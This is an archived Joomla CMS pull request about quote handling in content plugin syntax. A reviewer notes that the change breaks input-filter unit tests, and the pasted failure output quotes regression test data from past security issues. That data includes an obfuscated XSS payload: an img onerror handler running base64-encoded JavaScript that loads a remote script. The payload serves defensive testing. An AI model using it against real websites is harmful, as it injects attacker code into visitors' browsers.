Skip to content
This repository has been archived by the owner on Nov 26, 2017. It is now read-only.

Joomla CMS [#26439] Editors have problems with quotes in content plugins syntax #401

Closed
wants to merge 1 commit into from
Closed

Joomla CMS [#26439] Editors have problems with quotes in content plugins syntax #401

wants to merge 1 commit into from

Conversation

chdemko
Copy link
Contributor

@chdemko chdemko commented Sep 27, 2011

@dextercowley
Copy link
Contributor

Christope, this change breaks the unit test. I get 4 failures with this. These failures are tests from previous security issues. Mark

  1. JFilterInputTest::testCleanWithImgWhitelisted with data set "security_20110329a" ('string', '<img src='<img src='///'/> ', ' ', 'From specific cases')
    From specific cases
    Failed asserting that two strings are equal.
    --- Expected
    +++ Actual
    @@ @@
    -
    +img src='

  2. JFilterInputTest::testCleanWithImgWhitelisted with data set "security_20110329b" ('string', '<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ', ' ', 'From specific cases')
    From specific cases
    Failed asserting that two strings are equal.
    --- Expected
    +++ Actual
    @@ @@
    -
    +img src='

  3. JFilterInputTest::testCleanWithDefaultBlackList with data set "security_20110329a" ('string', '<img src='<img src='///'/> ', ' ', 'From specific cases')
    From specific cases
    Failed asserting that two strings are equal.
    --- Expected
    +++ Actual
    @@ @@
    -
    +img src='

  4. JFilterInputTest::testCleanWithImgBlackList with data set "security_20110328" ('string', '<img src='<img
    src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ', ' ', 'From specific cases')
    From specific cases
    Failed asserting that two strings are equal.
    --- Expected
    +++ Actual

@@ @@

+img src='

@chdemko
Copy link
Contributor Author

chdemko commented Sep 28, 2011

Waiting from http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&tracker_item_id=26439 for a new solution

@eddieajau
Copy link
Contributor

Closing pull request until a new solution can be found. Reopen when appropriate.

@eddieajau eddieajau closed this Sep 29, 2011
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@chdemko @dextercowley @eddieajau